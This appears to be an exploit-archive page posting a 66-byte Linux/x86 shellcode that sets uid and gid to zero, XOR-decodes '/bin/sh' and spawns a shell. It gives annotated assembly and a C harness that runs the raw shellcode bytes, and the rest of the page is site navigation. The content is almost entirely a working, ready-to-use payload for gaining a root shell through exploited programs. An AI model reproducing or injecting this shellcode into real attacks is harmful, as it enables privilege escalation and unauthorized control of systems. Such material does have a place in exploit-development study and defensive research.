Linux/x86 XOR Encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode

Linux/x86 XOR Encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode: Posted Jun 15, 2017; Authored by nullparasite; 66 bytes small Linux/x86 XOR encoded execve(/bin/sh) setuid(0) setgid(0) shellcode.; tags | x86, shellcode; systems | linux; SHA-256 | c56231d79b9d97ed7017f11b49238c722fe202fcfe76595a21905b422970b56f; Download | Favorite | View

Linux/x86 XOR Encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode

;Title: Linux/x86 - 66 byte - execve(/bin/sh) - setuid(0) - setgid(0) - XOR encrypted
;Author: nullparasite
;Contact: nullparasite@protonmail.ch
;Category: Shellcode
;Architecture: Linux x86
;Description: This shellcode, first set uid and gid to zero then call shell using execve. Also, /bin/sh defined as a XOR encrypted.
;Tested on: Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
 
====================================================================
 
global _start
 
section .text
 
_start:
jmp entrypoint ; jump immd.
 
prepare:
pop esi ; address of string -> esi
xor eax, eax ; clear eax
xor ecx, ecx ; ecx
mov BYTE [esi+7], al ; terminate string, str[7] = NULL
lea ebx, [esi] ; put address of string -> ebx
mov DWORD [esi + 8], ebx ; replace first 4-# with string
mov DWORD [esi + 12], eax ; replace last 4-# with NULL
 
mov BYTE cl, 7 ; set counter to 7
 
decode:
xor BYTE [esi + ecx - 1], 0x3 ; s[cl-1] = s[cl-1] ^ 3
sub cl, 1 ; dec count by 1
jnz decode ; jump if not zero
 
priv_setuid:
xor ebx, ebx ; clear ebx, setuid(0)
mov al, 0x17 ; setuid = 0x17
int 0x80 ; trap
 
priv_setgid:
xor ebx, ebx ; clear ebx, setgid(0)
mov al, 0x2e ; setgid = 0x2e
int 0x80 ; trap
 
shell:
mov BYTE al, 0x0b ; execve = 0x0b
mov ebx, esi ; arg1, /bin/sh
lea ecx, [esi + 8] ; arg2, p[0] = /bin/sh, p[1] = NULL
lea edx, [esi + 12] ; arg3, pointer to NULL
 
int 0x80 ; trap
 
entrypoint:
call prepare ; call prepare
db ',ajm,pk#########' ; store string on the stack
 
====================================================================
 
# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
 
#include<stdio.h>
 
unsigned char code[] = "\xeb\x34\x5e\x31\xc0\x31\xc9\x88\x46\x07\x8d"
"\x1e\x89\x5e\x08\x89\x46\x0c\xb1\x07\x80\x74"
"\x0e\xff\x03\x80\xe9\x01\x75\xf6\x31\xdb\xb0"
"\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8"
"\xc7\xff\xff\xff\x2c\x61\x6a\x6d\x2c\x70\x6b";
 
typedef int(*shellcode_t)();
 
int main(){
shellcode_t ret = (shellcode_t)code;
ret();
}
 
====================================================================

Top Authors In Last 30 Days

Red Hat 172 files
Ubuntu 47 files
Debian 22 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
tmrswrr 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Linux/x86 XOR Encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode

Linux/x86 XOR Encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Linux/x86 XOR Encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode

Share This

Linux/x86 XOR Encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems